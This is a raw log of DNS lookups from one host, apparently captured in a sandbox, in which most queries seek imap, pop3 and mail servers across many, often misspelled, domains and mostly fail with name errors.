Feb 21, 2024 00:26:13.029676914 CET	1.1.1.1	192.168.2.6	0x39b2	Name error (3)	terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.037152052 CET	1.1.1.1	192.168.2.6	0x9a71	Name error (3)	utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.039345026 CET	1.1.1.1	192.168.2.6	0xe88d	Name error (3)	x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.047396898 CET	1.1.1.1	192.168.2.6	0xd84c	Name error (3)	mailgate.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.071805000 CET	1.1.1.1	192.168.2.6	0x56b	Name error (3)	jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.084640026 CET	1.1.1.1	192.168.2.6	0xfad0	Name error (3)	hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.097090960 CET	1.1.1.1	192.168.2.6	0xc2a8	Name error (3)	farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.113121033 CET	1.1.1.1	192.168.2.6	0xe428	Name error (3)	hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.151247978 CET	1.1.1.1	192.168.2.6	0x89c8	Name error (3)	rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.178071976 CET	1.1.1.1	192.168.2.6	0xeae1	Name error (3)	pop.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.185355902 CET	1.1.1.1	192.168.2.6	0x3fa1	Name error (3)	radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.207062006 CET	1.1.1.1	192.168.2.6	0x8c54	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.11	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.207062006 CET	1.1.1.1	192.168.2.6	0x8c54	No error (0)	markoren-no.mail.protection.outlook.com		52.101.68.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.207062006 CET	1.1.1.1	192.168.2.6	0x8c54	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.8	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.207062006 CET	1.1.1.1	192.168.2.6	0x8c54	No error (0)	markoren-no.mail.protection.outlook.com		52.101.68.3	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.207062006 CET	1.1.1.1	192.168.2.6	0x8c54	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.12	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.207062006 CET	1.1.1.1	192.168.2.6	0x8c54	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.19	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.207062006 CET	1.1.1.1	192.168.2.6	0x8c54	No error (0)	markoren-no.mail.protection.outlook.com		52.101.68.15	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.209441900 CET	1.1.1.1	192.168.2.6	0xd279	Name error (3)	imap.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.213128090 CET	1.1.1.1	192.168.2.6	0xa0bd	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.3	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.213128090 CET	1.1.1.1	192.168.2.6	0xa0bd	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.28	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.213128090 CET	1.1.1.1	192.168.2.6	0xa0bd	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.12	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.213128090 CET	1.1.1.1	192.168.2.6	0xa0bd	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.213128090 CET	1.1.1.1	192.168.2.6	0xa0bd	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.15	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.213128090 CET	1.1.1.1	192.168.2.6	0xa0bd	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.6	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.213128090 CET	1.1.1.1	192.168.2.6	0xa0bd	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.4	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.225418091 CET	1.1.1.1	192.168.2.6	0xf2c9	Name error (3)	pop.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.241691113 CET	1.1.1.1	192.168.2.6	0x3ec	Name error (3)	pop3.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.265551090 CET	1.1.1.1	192.168.2.6	0xe718	Name error (3)	pop.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.292110920 CET	1.1.1.1	192.168.2.6	0xcc26	Name error (3)	tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.302964926 CET	1.1.1.1	192.168.2.6	0x3652	Name error (3)	pop.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.306055069 CET	1.1.1.1	192.168.2.6	0x9dbd	Name error (3)	hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.332171917 CET	1.1.1.1	192.168.2.6	0x605a	Name error (3)	ssh.archononline.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.337047100 CET	1.1.1.1	192.168.2.6	0xfade	Name error (3)	pop3.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.346837997 CET	1.1.1.1	192.168.2.6	0xe472	Name error (3)	pop3.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.381546974 CET	1.1.1.1	192.168.2.6	0x127f	Name error (3)	imap.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.421194077 CET	1.1.1.1	192.168.2.6	0x9bf3	Name error (3)	pop.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.426728010 CET	1.1.1.1	192.168.2.6	0x3fa3	Name error (3)	imap.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.475692987 CET	1.1.1.1	192.168.2.6	0x1179	Name error (3)	pop3.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.485569954 CET	1.1.1.1	192.168.2.6	0xb	Name error (3)	imap.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.487288952 CET	1.1.1.1	192.168.2.6	0x1f4e	Server failure (2)	pop.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.494848967 CET	1.1.1.1	192.168.2.6	0xf6d5	Server failure (2)	imap.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.569737911 CET	1.1.1.1	192.168.2.6	0x9102	Name error (3)	imap.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.619374037 CET	1.1.1.1	192.168.2.6	0x7f62	Name error (3)	pop.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.786807060 CET	1.1.1.1	192.168.2.6	0xfd00	Name error (3)	imap.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.823883057 CET	1.1.1.1	192.168.2.6	0xb2ba	Name error (3)	imap.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.861541986 CET	1.1.1.1	192.168.2.6	0xcde2	Name error (3)	imap.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.873444080 CET	1.1.1.1	192.168.2.6	0x50aa	Name error (3)	imap.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.904871941 CET	1.1.1.1	192.168.2.6	0x7423	Name error (3)	ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.909943104 CET	1.1.1.1	192.168.2.6	0x5c79	Name error (3)	imap.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.976931095 CET	1.1.1.1	192.168.2.6	0x994	Name error (3)	fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.977040052 CET	1.1.1.1	192.168.2.6	0x40e2	Name error (3)	imap.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.977081060 CET	1.1.1.1	192.168.2.6	0x92d3	Name error (3)	imap.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.977196932 CET	1.1.1.1	192.168.2.6	0x22	Name error (3)	pop3.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.977286100 CET	1.1.1.1	192.168.2.6	0x53d8	Name error (3)	imap.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.981762886 CET	1.1.1.1	192.168.2.6	0xd725	Name error (3)	imap.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.981904030 CET	1.1.1.1	192.168.2.6	0x353b	Name error (3)	hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.996802092 CET	1.1.1.1	192.168.2.6	0x4d15	Name error (3)	imap.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.258553028 CET	1.1.1.1	192.168.2.6	0x6fee	Name error (3)	gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.031071901 CET	1.1.1.1	192.168.2.6	0x19de	Name error (3)	imap.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.032241106 CET	1.1.1.1	192.168.2.6	0xff62	Name error (3)	mail.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.035919905 CET	1.1.1.1	192.168.2.6	0x23b9	Name error (3)	mail.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.037230015 CET	1.1.1.1	192.168.2.6	0x6cd3	Name error (3)	mail.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.073124886 CET	1.1.1.1	192.168.2.6	0xc1bb	Server failure (2)	att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.093544960 CET	1.1.1.1	192.168.2.6	0xeab7	Name error (3)	pop3.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.098481894 CET	1.1.1.1	192.168.2.6	0x4c83	Name error (3)	mail.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.104254007 CET	1.1.1.1	192.168.2.6	0xe2bd	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.73.11	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.104254007 CET	1.1.1.1	192.168.2.6	0xe2bd	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.73.16	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.104254007 CET	1.1.1.1	192.168.2.6	0xe2bd	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.73.19	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.104254007 CET	1.1.1.1	192.168.2.6	0xe2bd	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.68.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.104254007 CET	1.1.1.1	192.168.2.6	0xe2bd	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.68.5	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.104254007 CET	1.1.1.1	192.168.2.6	0xe2bd	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.68.25	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.104254007 CET	1.1.1.1	192.168.2.6	0xe2bd	No error (0)	cdgcapitalbourse-ma.mail.protection.outlook.com		52.101.73.26	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.116188049 CET	1.1.1.1	192.168.2.6	0xb43c	Name error (3)	mail.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.117235899 CET	1.1.1.1	192.168.2.6	0xdcd6	Name error (3)	mail.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.118607044 CET	1.1.1.1	192.168.2.6	0x785f	Name error (3)	mail.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.130840063 CET	1.1.1.1	192.168.2.6	0x5d50	Name error (3)	imap.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.134305954 CET	1.1.1.1	192.168.2.6	0x8240	Name error (3)	spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.150696039 CET	1.1.1.1	192.168.2.6	0x348e	Name error (3)	mail.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.176630974 CET	1.1.1.1	192.168.2.6	0xfade	No error (0)	alt4.aspmx.l.google.com		142.250.153.26	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.184802055 CET	1.1.1.1	192.168.2.6	0xcd4e	Name error (3)	mail.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.210863113 CET	1.1.1.1	192.168.2.6	0x3919	Name error (3)	mail.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.260782957 CET	1.1.1.1	192.168.2.6	0x8b1f	Name error (3)	outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.264596939 CET	1.1.1.1	192.168.2.6	0xa362	Name error (3)	mail.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.272329092 CET	1.1.1.1	192.168.2.6	0x4244	Name error (3)	pop3.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.295392990 CET	1.1.1.1	192.168.2.6	0xd93c	Name error (3)	hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.324678898 CET	1.1.1.1	192.168.2.6	0x88ba	Name error (3)	pop3.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.325263977 CET	1.1.1.1	192.168.2.6	0x109e	Name error (3)	pop3.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.379298925 CET	1.1.1.1	192.168.2.6	0xb597	Name error (3)	mail.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.380388975 CET	1.1.1.1	192.168.2.6	0x10c0	Name error (3)	kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.386260033 CET	1.1.1.1	192.168.2.6	0xa7ff	Name error (3)	pop3.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.391601086 CET	1.1.1.1	192.168.2.6	0xc3be	Name error (3)	mail.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.395597935 CET	1.1.1.1	192.168.2.6	0xcef7	Name error (3)	imap.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.398036957 CET	1.1.1.1	192.168.2.6	0x8a17	Name error (3)	imap.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.398715973 CET	1.1.1.1	192.168.2.6	0x7dcc	Name error (3)	mail.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.399374962 CET	1.1.1.1	192.168.2.6	0x5c0d	Name error (3)	mail.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.407144070 CET	1.1.1.1	192.168.2.6	0xbbe4	Name error (3)	imap.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.419909000 CET	1.1.1.1	192.168.2.6	0xb86d	No error (0)	ww12.imailzone.com	pltraffic33.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:15.419909000 CET	1.1.1.1	192.168.2.6	0xb86d	No error (0)	pltraffic33.com		72.52.178.23	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.422441959 CET	1.1.1.1	192.168.2.6	0xf7f4	Name error (3)	pop3.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.427378893 CET	1.1.1.1	192.168.2.6	0x5a91	Name error (3)	mail.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.432171106 CET	1.1.1.1	192.168.2.6	0x1ffc	Name error (3)	pop3.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.434715033 CET	1.1.1.1	192.168.2.6	0x49d8	Name error (3)	imap.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.435846090 CET	1.1.1.1	192.168.2.6	0x4a27	Name error (3)	imap.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.438136101 CET	1.1.1.1	192.168.2.6	0xf7fe	Name error (3)	pop3.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.438710928 CET	1.1.1.1	192.168.2.6	0xdbf7	Name error (3)	mail.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.459522009 CET	1.1.1.1	192.168.2.6	0xd678	Name error (3)	imap.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.460153103 CET	1.1.1.1	192.168.2.6	0x2b05	Name error (3)	imap.sq-community.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.473777056 CET	1.1.1.1	192.168.2.6	0x267e	Name error (3)	mail.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.476463079 CET	1.1.1.1	192.168.2.6	0x939	Name error (3)	pop3.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.477998018 CET	1.1.1.1	192.168.2.6	0x28b5	Name error (3)	mail.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.481849909 CET	1.1.1.1	192.168.2.6	0x3855	Name error (3)	pop3.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.489665031 CET	1.1.1.1	192.168.2.6	0x9f43	Name error (3)	imap.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.490012884 CET	1.1.1.1	192.168.2.6	0xcb14	Name error (3)	pop3.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.511271954 CET	1.1.1.1	192.168.2.6	0xe641	Name error (3)	mail.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.513200045 CET	1.1.1.1	192.168.2.6	0xddd5	Name error (3)	pop3.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.529606104 CET	1.1.1.1	192.168.2.6	0x868f	Name error (3)	mail.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.530009031 CET	1.1.1.1	192.168.2.6	0x9115	Name error (3)	pop3.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.533999920 CET	1.1.1.1	192.168.2.6	0x5ad2	Name error (3)	pop3.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.555350065 CET	1.1.1.1	192.168.2.6	0xda1d	Name error (3)	mail.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.565383911 CET	1.1.1.1	192.168.2.6	0x21a	Name error (3)	imap.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.576293945 CET	1.1.1.1	192.168.2.6	0xd978	Name error (3)	mail.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.583827019 CET	1.1.1.1	192.168.2.6	0xe59b	Name error (3)	imap.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.626878977 CET	1.1.1.1	192.168.2.6	0x35e3	Name error (3)	pop3.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.628478050 CET	1.1.1.1	192.168.2.6	0x6f93	Name error (3)	esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.654757023 CET	1.1.1.1	192.168.2.6	0xc73a	Name error (3)	mail.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.661566019 CET	1.1.1.1	192.168.2.6	0x674d	Name error (3)	imap.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.661668062 CET	1.1.1.1	192.168.2.6	0x30db	Name error (3)	pop3.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.669380903 CET	1.1.1.1	192.168.2.6	0xa7db	Name error (3)	mail.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.745520115 CET	1.1.1.1	192.168.2.6	0x121e	Name error (3)	imap.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.752490997 CET	1.1.1.1	192.168.2.6	0x3c6d	Name error (3)	pop3.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.753810883 CET	1.1.1.1	192.168.2.6	0x1847	Name error (3)	pop3.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.759788036 CET	1.1.1.1	192.168.2.6	0x788a	Name error (3)	pop3.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.761279106 CET	1.1.1.1	192.168.2.6	0x6451	Name error (3)	pop3.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.763744116 CET	1.1.1.1	192.168.2.6	0x344f	Name error (3)	imap.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.780533075 CET	1.1.1.1	192.168.2.6	0xe936	Name error (3)	pop3.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.798612118 CET	1.1.1.1	192.168.2.6	0x9049	Name error (3)	pop3.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.799748898 CET	1.1.1.1	192.168.2.6	0x8cfd	Name error (3)	mail.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.806071997 CET	1.1.1.1	192.168.2.6	0x1b85	Name error (3)	imap.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.842268944 CET	1.1.1.1	192.168.2.6	0xe857	Name error (3)	pop3.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.843556881 CET	1.1.1.1	192.168.2.6	0x75a4	Name error (3)	pop3.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.848231077 CET	1.1.1.1	192.168.2.6	0xd9e7	Name error (3)	imap.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.864454031 CET	1.1.1.1	192.168.2.6	0xbfcd	Name error (3)	imap.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.869091034 CET	1.1.1.1	192.168.2.6	0xfeaa	Name error (3)	mail.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.873863935 CET	1.1.1.1	192.168.2.6	0xe9cf	Name error (3)	imap.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.874684095 CET	1.1.1.1	192.168.2.6	0xbd58	Name error (3)	imap.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.879638910 CET	1.1.1.1	192.168.2.6	0xc0b9	Name error (3)	imap.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.882031918 CET	1.1.1.1	192.168.2.6	0x21a9	Name error (3)	imap.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.884166956 CET	1.1.1.1	192.168.2.6	0x7505	Name error (3)	pop3.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.886874914 CET	1.1.1.1	192.168.2.6	0xdd26	Name error (3)	imap.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.917120934 CET	1.1.1.1	192.168.2.6	0x53fc	Name error (3)	imap.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.927599907 CET	1.1.1.1	192.168.2.6	0x536c	Name error (3)	imap.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.950263977 CET	1.1.1.1	192.168.2.6	0x26ee	Name error (3)	mail.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.964615107 CET	1.1.1.1	192.168.2.6	0x7cd2	Name error (3)	mail.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.976063013 CET	1.1.1.1	192.168.2.6	0xc528	Name error (3)	mail.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.001328945 CET	1.1.1.1	192.168.2.6	0x2ce7	Server failure (2)	mail.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.003879070 CET	1.1.1.1	192.168.2.6	0x9b65	Name error (3)	mail.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.003935099 CET	1.1.1.1	192.168.2.6	0x6bc3	Name error (3)	pop3.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.005816936 CET	1.1.1.1	192.168.2.6	0x8e46	Name error (3)	pop3.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.006154060 CET	1.1.1.1	192.168.2.6	0x6ba1	Name error (3)	mail.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.025629044 CET	1.1.1.1	192.168.2.6	0x3ad0	Name error (3)	mailgate.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.025667906 CET	1.1.1.1	192.168.2.6	0xc1f0	Name error (3)	mail.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.031729937 CET	1.1.1.1	192.168.2.6	0x7b39	Name error (3)	mail.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.056566954 CET	1.1.1.1	192.168.2.6	0x42f0	Name error (3)	pop3.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.058389902 CET	1.1.1.1	192.168.2.6	0x235d	Name error (3)	mail.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.081350088 CET	1.1.1.1	192.168.2.6	0x6519	Name error (3)	mail.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.083353996 CET	1.1.1.1	192.168.2.6	0x3acf	Name error (3)	pop3.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.112241030 CET	1.1.1.1	192.168.2.6	0x285b	Name error (3)	mailgate.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.118295908 CET	1.1.1.1	192.168.2.6	0x78e0	Name error (3)	pop3.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
